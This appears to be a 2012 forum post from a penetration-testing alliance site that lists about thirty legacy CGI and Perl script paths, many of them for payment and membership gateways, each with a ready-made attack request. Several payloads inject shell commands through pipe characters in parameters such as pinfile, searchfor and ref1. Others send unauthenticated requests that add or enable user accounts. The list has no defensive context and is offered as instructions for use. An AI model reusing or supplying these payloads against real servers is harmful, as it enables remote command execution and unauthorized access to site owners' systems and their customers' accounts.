China Network Penetration Testing Alliance
Title: Cgi-bin: 30 vulnerabilities + how to use them
Author: admin
Time: 2012-9-13 16:55
==============================
/smspass.pl
username=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
ADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30
==============================